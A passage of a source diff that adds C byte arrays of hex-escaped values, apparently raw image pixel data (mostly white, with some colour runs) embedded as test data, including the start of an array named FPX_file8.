+"\xf4\xed\xf0\xe5\xd6\xf1\xe7\xd9\xfc\xfb\xf9\xfe\xfe\xfd\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf6\xf3\xe7\xde\xd2"
+"\xea\xed\xf2\xe6\xe8\xf0\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe5\xe6\xec\xe3\xe3\xe6\xde\xd8\xd1\xe5\xe8"
+"\xf0\xe3\xe3\xe5\xd6\xc3\xa8\xe0\xdc\xd8\xe5\xe8\xef\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe1\xdf\xde\xd3\xbb\x9b\xe6\xe9\xf1\xe6\xe9\xf1\xe5"
+"\xe8\xf0\xd2\xb9\x97\xe5\xea\xf2\xe6\xe9\xf1\xe4\xe5\xea\xdc\xd2"
+"\xc6\xd3\xba\x99\xe3\xe3\xe6\xe6\xe9\xf1\xe4\xe5\xea\xe0\xde\xdc"
+"\xe3\xe5\xe8\xe3\xe5\xe9\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xf0\xe5\xe8\xef\xe5\xe7"
+"\xeb\xec\xea\xe8\xf2\xf1\xef\xf7\xf5\xf2\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xfd\xfb\xf9\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xff\xff\xff"
+"\xfc\xfb\xfa\xec\xeb\xeb\xe7\xe8\xeb\xe6\xe8\xee\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe7\xed\xe0\xdc\xd9\xe3\xe5"
+"\xe8\xe4\xe6\xeb\xe3\xe3\xe6\xd2\xbb\x9b\xde\xd8\xd0\xe5\xe8\xef"
+"\xe6\xe9\xf1\xe3\xe4\xe8\xd4\xbf\xa3\xe5\xe9\xf1\xe6\xe9\xf1\xe3"
+"\xe4\xe7\xd9\xca\xb7\xe6\xe9\xf1\xe6\xe9\xf1\xd8\xc7\xb1\xd3\xbb"
+"\x9a\xdc\xd2\xc5\xe3\xe2\xe3\xe1\xde\xdc\xe1\xe0\xe0\xde\xd8\xcf"
+"\xe0\xdd\xd9\xe0\xdd\xda\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe5"
+"\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xee\xe8\xe9\xeb\xec\xeb\xeb\xf2\xf1"
+"\xf0\xfc\xfb\xfa\xfe\xfd\xfd\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfc\xfb\xfa\xf0\xee\xeb\xea"
+"\xea\xeb\xe6\xe7\xea\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe4\xe6"
+"\xeb\xe1\xde\xdc\xe2\xe2\xe4\xe3\xe2\xe4\xdb\xcf\xc0\xd2\xba\x99"
+"\xe4\xe6\xec\xe5\xe9\xf0\xda\xcd\xbb\xe4\xe7\xed\xe3\xe2\xe4\xd4"
+"\xbf\xa0\xe4\xe5\xe9\xe1\xe0\xdf\xca\xa4\x70\xe1\xe0\xe0\xe0\xdc"
+"\xd8\xdd\xd6\xcd\xe4\xe5\xeb\xe5\xe7\xef\xe3\xe3\xe7\xc7\xa0\x6a"
+"\xc2\x91\x4f\xc8\xa4\x72\xcc\xd5\xea\xc3\xcf\xee\xce\xd8\xf1\xd2"
+"\xd8\xe9\xd4\xdd\xf0\xdd\xe4\xf5\xe2\xe9\xfa\xf0\xf4\xfc\xf4\xf6"
+"\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfd\xfd\xf9"
+"\xf7\xf4\xf3\xf2\xf0\xe8\xe9\xec\xe5\xe7\xed\xe5\xe8\xf0\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe4\xe7\xed\xde\xd8\xd1\xe4\xe5\xe9\xdc\xd3\xc7"
+"\xda\xce\xbd\xe4\xe5\xea\xdd\xd4\xca\xe3\xe3\xe5\xdb\xd0\xc1\xd4"
+"\xbd\x9e\xd8\xc9\xb4\xca\xa3\x6d\xdf\xdd\xd9\xe2\xe1\xe2\xe1\xe0"
+"\xe0\xe2\xe1\xe2\xe6\xe9\xf1\xe6\xe9\xf1\xe1\xe0\xe0\xcd\xbd\xa6"
+"\xd1\xc0\xa8\xce\xba\x9e\xb2\xc0\xe2\x9b\xb3\xec\xbb\xcc\xf4\xb4"
+"\xc7\xf3\xb2\xc6\xf5\xb0\xc5\xf5\xc4\xd4\xf7\xd8\xe2\xf9\xde\xe6"
+"\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xfe\xfe\xfd\xf6\xf5\xf3\xee\xed\xec\xe8\xe9\xeb\xe5\xe8"
+"\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe2\xe2\xe4\xe2\xe1\xe2\xdf\xdb\xd7"
+"\xd3\xbb\x9a\xd8\xc9\xb5\xde\xd7\xcf\xdd\xd5\xcb\xd3\xbc\x9d\xd6"
+"\xc3\xa8\xd2\xbb\x99\xe2\xe2\xe5\xe0\xde\xdb\xe3\xe3\xe6\xe5\xe8"
+"\xf0\xe6\xe9\xf1\xe5\xe8\xf0\xe5\xe8\xf0\xe1\xdf\xde\xdc\xe2\xe7"
+"\xe8\xee\xf4\xdc\xd9\xd4\xd8\xde\xee\xd1\xdd\xf7\xe5\xec\xfb\xdc"
+"\xe5\xfa\xda\xe4\xf9\xd6\xe1\xf9\xe9\xee\xfb\xec\xf1\xfc\xee\xf2"
+"\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf8"
+"\xf6\xf4\xf3\xf0\xeb\xe8\xe5\xe5\xe6\xeb\xe5\xe8\xf0\xe4\xe6\xec"
+"\xe2\xe6\xed\xd9\xd6\xd1\xd1\xc5\xb0\xce\xc0\xa7\xcd\xbc\xa0\xd3"
+"\xcb\xbc\xdd\xdc\xdc\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe7\xed\xe6\xe7"
+"\xeb\xe9\xe8\xe9\xf3\xf1\xf0\xf8\xf7\xf5\xf8\xf4\xee\xd8\xc5\xaa"
+"\xd9\xc7\xad\xd9\xc4\xa8\xdd\xe4\xf6\xd4\xdf\xf8\xd7\xe2\xf9\xd4"
+"\xe0\xf9\xd8\xe3\xf9\xd8\xe3\xf9\xee\xf3\xfc\xfe\xfe\xfe\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe"
+"\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xfe\xfd\xfd\xfc\xfb\xf9\xeb\xea\xe9\xe6\xe9\xf0\xe6\xe9\xf1"
+"\xae\xc7\xd6\x87\xb8\xd3\x81\xb7\xd3\x81\xb5\xd1\x81\xb6\xd1\x82"
+"\xb7\xd5\x9f\xbe\xce\xdd\xdf\xe2\xe6\xe9\xf1\xe1\xdf\xde\xef\xee"
+"\xed\xee\xee\xf0\xe2\xe9\xf9\xe1\xe9\xfb\xea\xef\xfa\xdc\xdd\xe5"
+"\xdf\xdf\xe4\xef\xeb\xe8\xf0\xf4\xfc\xfd\xfe\xfe\xfe\xfe\xfe\xfe"
+"\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xfb\xfb"
+"\xfc\xfd\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfd\xfd\xfd\xfb"
+"\xfb\xfb\xfd\xfd\xfd\xfd\xfd\xfd\xfe\xfe\xfe\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xfa\xfa\xfb\xfb\xfb\xe7"
+"\xe7\xe7\xdb\xdc\xdc\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf1\xee\xea\xe5\xe7\xeb\xe6\xe9\xf1"
+"\x61\xae\xda\x37\xaa\xef\x35\xaa\xf0\x35\xa9\xee\x35\xa9\xef\x35"
+"\xaa\xf0\x52\xa7\xd6\xbd\xc0\xbf\xb6\xd5\xf1\xc6\xd4\xe0\xd8\xe7"
+"\xf3\xdd\xe8\xfa\xab\xc1\xf4\xa7\xbe\xf4\xac\xc2\xf5\x99\xb3\xf4"
+"\xa9\xc0\xf4\xd9\xe3\xf9\xc5\xd5\xf8\xf9\xfb\xfe\xff\xff\xff\xfd"
+"\xfd\xfd\xf9\xfa\xfa\xfc\xfc\xfc\xfb\xfb\xfb\xfe\xfe\xfe\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xe6\xe6\xe6\xe7\xe7\xe7\xf7\xf7\xf7\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfb\xfb\xfc"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf1\xf1\xf2\xf2\xf2"
+"\xf2\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xca\xca\xca\xd2\xd2\xd3\xc7\xc8\xc9\xb3"
+"\xb4\xb3\xb6\xb7\xb7\xc0\xc1\xc1\xe3\xe3\xe3\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xdd\xdd\xdd\xc3\xc3\xc3\xb4\xb5\xb5\xbf"
+"\xc0\xc1\xb8\xb9\xba\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf0\xee\xeb\xe5\xe7\xeb\xe6\xe9\xf1"
+"\x51\xad\xe2\x32\xad\xf7\x32\xad\xf7\x30\x7f\xad\x2f\x8d\xc3\x32"
+"\xaa\xf2\x43\xa9\xe5\xb5\xc2\xc9\xe6\xe9\xf1\xdf\xdd\xdb\xf6\xf7"
+"\xf7\xfc\xfd\xfe\xf7\xf9\xfe\xf8\xf9\xfd\xf8\xfa\xfd\xf8\xfa\xfe"
+"\xf8\xfa\xfe\xf4\xf7\xfd\xf1\xf5\xfc\xfd\xfd\xfe\xff\xff\xff\xcf"
+"\xd0\xd0\xbf\xc0\xc0\xa5\xa7\xa8\xb6\xb7\xb7\xec\xec\xec\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xc6\xc6\xc7\xa8\xa9\xa8\xbf\xbf\xc0\xfd\xfd\xfd\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf5\xf5\xf5\xf1\xf1\xf2\xf2\xf2\xf2"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xe2\xe2\xe2\xd6\xd7\xd7\xdc\xdc\xdd\xd4"
+"\xd5\xd5\xcd\xce\xce\xcb\xcc\xcc\xf1\xf1\xf1\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xef\xef\xf0\xd5\xd5\xd6\xd1\xd1\xd2\xd4"
+"\xd4\xd5\xcd\xce\xce\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf2\xf0\xef\xe6\xe8\xed\xe6\xe9\xf1"
+"\x51\xad\xe2\x32\xad\xf7\x32\xad\xf7\x31\x7d\xab\x30\x91\xcb\x32"
+"\xa8\xef\x43\xa9\xe5\xb5\xc7\xd2\xe6\xe9\xf1\xdf\xdd\xdb\xf6\xf7"
+"\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xe5"
+"\xe5\xe5\xc9\xca\xcb\xbd\xbe\xbf\xd3\xd4\xd5\xf5\xf5\xf6\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xd6\xd6\xd7\xc7\xc7\xc7\xd1\xd1\xd1\xfe\xfe\xfe\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfd\xfd\xfd\xfc\xfc\xfc\xfd\xfd\xfd\xf4"
+"\xec\xe2\xf9\xf7\xf5\xfb\xfb\xfb\xfe\xfe\xfe\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfa\xfa\xfb\xfb\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf1\xee\xec\xe5\xe7\xec\xe6\xe9\xf1"
+"\x5b\xad\xdc\x33\xab\xf3\x32\xab\xf4\x32\x9b\xdb\x32\xa7\xed\x32"
+"\xab\xf3\x4a\xa9\xe0\xba\xc4\xc8\xe6\xe9\xf1\xdf\xdd\xda\xf6\xf7"
+"\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc"
+"\xfb\xfa\xf1\xee\xe9\xee\xec\xeb\xfc\xfc\xfc\xfe\xfe\xfe\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xeb\xe7\xe1\xf4\xf2\xf0\xfb\xfb\xfb\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf8\xf2\xea\xf0\xe3\xd2\xf3\xec\xe1"
+"\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc"
+"\xfa\xf7\xec\xdb\xc4\xd7\xb4\x84\xf6\xf0\xe8\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf7\xf2\xd7"
+"\xb3\x83\xe7\xd2\xb5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf2\xef\xea\xe5\xe8\xef\xe6\xe9\xf1"
+"\xe5\xe8\xef\xe4\xe7\xed\xe4\xe5\xea\xe4\xe7\xec\xe4\xe5\xe9\xe4"
+"\xe6\xec\xe5\xe7\xee\xe6\xe9\xf1\xe6\xe9\xf1\xd6\xcd\xbe\xfd\xfd"
+"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfa\xdd"
+"\xbe\x94\xf9\xf4\xee\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xe9\xd8\xb4\x82"
+"\xd4\xaf\x7c\xfb\xf8\xf4\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xea\xfa\xf7"
+"\xf3\xf6\xee\xe3\xfc\xf9\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xf3\xed"
+"\xe2\xcb\xac\xfd\xfc\xfb\xfb\xf8\xf5\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xd4\xab\x75\xda\xb8\x88\xed\xde"
+"\xc9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe"
+"\xfe\xfe\xd7\xb2\x7f\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf2\xef\xeb\xec\xed\xf1\xe7\xe5\xe3"
+"\xe6\xe4\xe1\xed\xee\xf3\xe7\xe5\xe2\xe4\xdd\xd6\xe9\xe9\xe9\xeb"
+"\xec\xee\xed\xee\xf1\xe4\xe0\xda\xee\xf0\xf5\xfa\xfb\xfd\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xef\xe1\xcd\xce\x9f\x5f\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfc\xfa\xf7\xed\xdd\xc8\xd2\xa9\x72\xf3\xea\xdc"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xed\xdf\xcb\xfa\xf7\xf2\xf7\xf2\xea\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe"
+"\xfd\xfd\xfc\xfd\xfc\xfb\xf3\xe9\xdc\xfa\xf7\xf3\xf6\xf0\xe8\xfe"
+"\xfd\xfc\xff\xff\xff\xff\xff\xff\xfa\xf7\xf2\xf0\xe4\xd3\xe5\xce"
+"\xaf\xe7\xd2\xb5\xf2\xe8\xd9\xfb\xf9\xf5\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe"
+;
+
+unsigned char FPX_file8[] = 
+"\xfe\xfe\xf8\xf2\xea\xe4\xcc\xab\xf6\xef\xe5\xfe\xfe\xfd\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9"
+"\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xf9\xe6\xd2\xb6\xfa\xf8\xf5\xfc"
+"\xfb\xfa\xfc\xfb\xfa\xfe\xfe\xfe\xff\xff\xff\xfe\xfe\xfd\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xfd\xfc\xfb\xe4\xcc\xab\xe3\xca\xa8\xf3\xe8\xda\xfe"
+"\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfb\xf8"
+"\xf3\xe7\xd1\xb4\xe1\xc7\xa3\xe6\xd0\xb1\xfa\xf7\xf2\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xfc\xfa\xf8\xf7\xf1\xe9\xf0"
+"\xe5\xd6\xf9\xf4\xee\xf7\xf1\xe9\xfd\xfb\xf9\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xfc"
